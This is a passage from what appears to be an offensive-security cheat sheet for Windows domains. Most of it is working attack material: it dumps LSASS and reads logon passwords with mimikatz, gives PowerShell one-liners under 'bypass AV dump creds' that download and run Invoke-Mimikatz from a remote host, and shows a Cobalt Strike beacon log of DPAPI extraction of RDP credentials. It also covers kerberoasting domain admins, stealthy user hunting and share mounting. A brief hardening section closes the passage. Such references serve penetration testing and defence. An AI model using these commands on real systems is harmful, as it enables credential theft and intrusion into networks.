procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
#load lass.dmp and extract secrets
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
Auto Memory of LSA Service for offline mimikatz:
#Auto dump processes with autoproc.py
python3 autoProc.py domain/user@target
bypass AV dump creds¶
powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/oeoFuI'); Invoke-Mimikatz -DumpCreds"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/scripts/downloaded/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell "IEX (New-Object Net.WebClient).DownloadString('http://example.com/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"
Extracting Sessions from RDP¶
Locate the 'Credentials' directory for the current user
beacon> ls
[*] Tasked beacon to list files in .
[+] host called home, sent: 19 bytes
[*] Listing: C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Size Type Last Modified Name
---- ---- ------------- ----
436b fil 10/27/2017 14:30:02 936A68B5AC87C545C4A22D1AF264C8E9
beacon> mimikatz dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9"
[*] Tasked beacon to run mimikatz's dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" command
[+] host called home, sent: 863301 bytes
[+] received output:
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {37fe87d9-4d2d-4dc6-aa54-1a011f267940}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 3c40f618fa2eeb9c8a048a0d2be1e25b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : a5848e4b82558e8a7acd65965b0177a2
dwDataLen : 000000f0 - 240
pbData : c76436385f98c33901c9390ac51985bde9de189d02ea22ccfbd8eb2f430d5b2720a07d7bc26821e88a45d373fbf7fe97e5bdec91ed7f751852a6bd385b2e33ad4eb37dc3fa76d2b7a3f75652db41fb2f6a4ac362722016d434a8ec96e01593ab99dbb003ffcc5a5ed654c93aa55efb4cc25186d463abd82de133ddb6015d2bd8a4f56d63c61209315ec86127175482c7b9e03c4772a814c30c57f639b97c72e0f73896fa521d77057d60229f3f4a00f186395ad34e6c793c9a07464da70691d4d9a5c019c81d97e66a7178b85483e6571a2e6f8c066631d6b60eeb834132d16aa3f3515519a2fd72c589f6865dd75ffb
dwSignLen : 00000014 - 20
pbSign : 0f7aca73255e6ee56546c5872eb1bb1cdb87f3ed
Extracting the key (using the SID of the current user in the path):
beacon> mimikatz dpapi::masterkey /in:"%localappdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc
[*] Tasked beacon to run mimikatz's dpapi::masterkey /in:"%localappdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc command
[+] host called home, sent: 863306 bytes
beacon> mimikatz dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc
[*] Tasked beacon to run mimikatz's dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\37fe87d9-4d2d-4dc6-aa54-1a011f267940" /rpc command
[+] host called home, sent: 863306 bytes
[+] received output:
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {37fe87d9-4d2d-4dc6-aa54-1a011f267940}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 573921aedbae9e259ceab758c93423da
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 26a67e0c533081bc0630285215b2712fe8fdfb2c5aa8ca7e956cafbe657fdf38726c79f2f6615d67144e570608b3ee8ee6ba8da73c52685f2c5885d09d1951dc6aa15d15fa158b24df986bf9a79790c7d26a2338f1ca5ae2286b172065eee239245453f61931b7dd
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 0bb5ba78c3afdf64d592d7ee08f583d2
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : b440d2dbe5fdc0467cb0391f25e4c9dfea2a69257a6d86a37aed23644553223f20998a13549faed5b104e2e7424b3f3a2afe6cebdb9d90a27abb3e6626f8e0b3910c15053337987a
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {9b9cbac1-259d-43ae-a73d-a4691113e495}
pbSecret : 3a29d464f26e1c729afcabe90850b893835b321c4034b0743999156beae3d962f2b474b6cd06e4d1afc1211e815818a37e9cb0bba6d17ce43e3788e35b9067f04ddba73add66af826f149a9d89d8e0080343f5b6a3242fec138c3add16e537fe0d3938d24db75296aaa4ec580f395e921acd293ad884d973050d5314841a6c1b4a8b50b4fbf28bac90c5b29346a5767571afbdc350ca7f3259d29c703da6be5399d211083380d99ef6c857784f5904019a10ac694b3d396c0fb516ae9567d813055d62c8a5321324bd03791df7cfddf155c084986a91dd52bb3b4be1361145ebefdf233c985fecaf3c9d33fbcb33f995329b01bb154eb4e35865f910185b0c75
pbAccesscheck : 3761e28d733e8e9f857797275b312d94d1d3dee09260ee1183b5efeae95a487f03e330e6bf8bda8cd5a212da773906f88ad8034c0680731906bc5e533ec6f7893e30cd01de709363d46da3d55995f0f007335d80b1140e1e
Auto SID from path seems to be: S-1-5-21-1396373213-2872852198-2033860859-1151
[domainkey] with RPC
[DC] 'lab.local' will be the domain
[DC] 'dc1.lab.local' will be the DC server
key : 40fc84e4d4f44[...]7067
sha1: fcfcfa4cf4f4a89ae9375bc6edd9a15b2c876cea
Default Mimikatz:
beacon> mimikatz dpapi::cache
[*] Tasked beacon to run mimikatz's dpapi::cache command
[+] host called home, sent: 863302 bytes
[+] received output:
CREDENTIALS cache
=================
MASTERKEYS cache
================
DOMAINKEYS cache
================
Specific masterkey:
beacon> mimikatz dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" /masterkey:40fc84e4d4f44[...]7067
[*] Tasked beacon to run mimikatz's dpapi::cred /in:"%localappdata%\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9" /masterkey:40fc84e4d4f44[...]7067 command
[+] host called home, sent: 863301 bytes
[+] received output:
**BLOB**
dwVersion : 00000001 - 1
[...]
Decrypting Credential:
* masterkey : 40fc84e4d4f44[...]7067
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000ec - 236
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 27/10/2017 13:30:02
unkFlagsOrSize : 00000030 - 48
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=TERMSRV/srv1.lab.local
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : LAB\<user>
CredentialBlob : <password_will_be_here>
Attributes : 0
Domain Enumeration¶
Enumeration from a machine not joined in the domain:
In order to execute in the context of a domain user without joining your system in the domain you have to do the following
runas /netonly /user:fqdn.domain.com\user cmd.exe
Powerview needs the DNS to be set to the organisation DNS to work.
Get All SPN users from a group (recursive) and preview Username / SPN:
get-domaingroupmember -identity "Domain Admins" -recurse| % {get-domainuser -spn -identity $_.membername -properties samaccountname,serviceprincipalname}|fl
Automated kerberoast of recurse users in privileged groups:
get-domaingroupmember -identity "Domain Admins" -recurse| % {get-domainuser -spn -identity $_.membername}| % {invoke-kerberoast -identity $_.samaccountname}
Other Users¶
powerview (master branch)
Invoke-UserHunter -Stealth -StealthSource [OPT] -StopOnSuccess
DFS (Distributed File System) share can be used as a -StealthSource if user profiles are stored using
\CORP\PROFILE\H\
instead of
\SHARE_SERVER\PROFILE\H\
Correlating group membership information with active sessions:
get-netgroupmember -groupname "domain admins" | foreach-object { Get-netgroupmember -groupname $_.MemberName } | foreach-object {$_.MemberName} | tee-object admin-users.txt
cat .\admin-users.txt | foreach { select-string $_ .\active_sessions.log}
Listing / Mounting Shares¶
smbclient -W "<domain>" -U "<username>%<password>" //<share-host>/<share-name>
# Use -L for listing only
# Note sure why, but "smbclient -L //ip-address" may succeed where "smbclient -L //hostname" may fail...
mount -t cifs -o sec=ntlmssp,username=<username>,pass=<password>,domain=<domain> //<share-ip>/<share-name> /mnt/<local-share-destination>/
Use the commands below if you can't connect with SMB on a share (which you know is open). It's possible the version is too recent so you have to specify SMB3.
mount -v -t cifs -o username=<username>,domain=<domain>,vers=3.0 //<share-ip>/<share-name> /mnt/<local-share-destination>/
smbclient -m SMB3 -U <username> -W <domain> -d 6 //<share-ip>/<share-name>
Otherwise you may get this error:
$ smbclient -U CORP -L //192.168.56.101/C$/Tools
WARNING: The "syslog" option is deprecated
Enter CORP's password:
protocol negotiation failed: NT_STATUS_CONNECTION_RESET
$ smbclient -U CORP -m SMB3 -L //192.168.56.101/C$/Tools
WARNING: The "syslog" option is deprecated
Enter CORP's password:
Domain=[JOHN-PC] OS=[] Server=[]
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
Tools Disk
Users Disk
Connection to 192.168.56.101 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
NetBIOS over TCP disabled -- no workgroup available
Fixing the Vulnerability¶
Disabling LLMNR via group policy:
1. Open gpedit.msc
2. Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
3. Set Turn off multicast name resolution to Enabled
Disable NBT-NS:
1. Go to network card properties
2. Go to IPv4 > Advanced > WINS and then under “NetBIOS setting”
3. Select Disable NetBIOS over TCP/IP
Disable NBT-NS by registry:
1. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces{$InterfaceID}\NetbiosOptions
2. Set the REG_DWORD to 2
Enable SMB signing via group policy:
1. Open the gpedit.msc
2. Open Computer Configuration | Windows Settings | Security Settings | Local Policies | Security Options
3. Set Digitally sign communications (always)
4. Set Digitally sign communications (if server agrees)
5. Set Send unencrypted password to third-party SMB Servers
Enable SMB signing via registry:
1. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkStation\
Parameters
2. Create a DWORD called RequireSecuritySignature and set to 1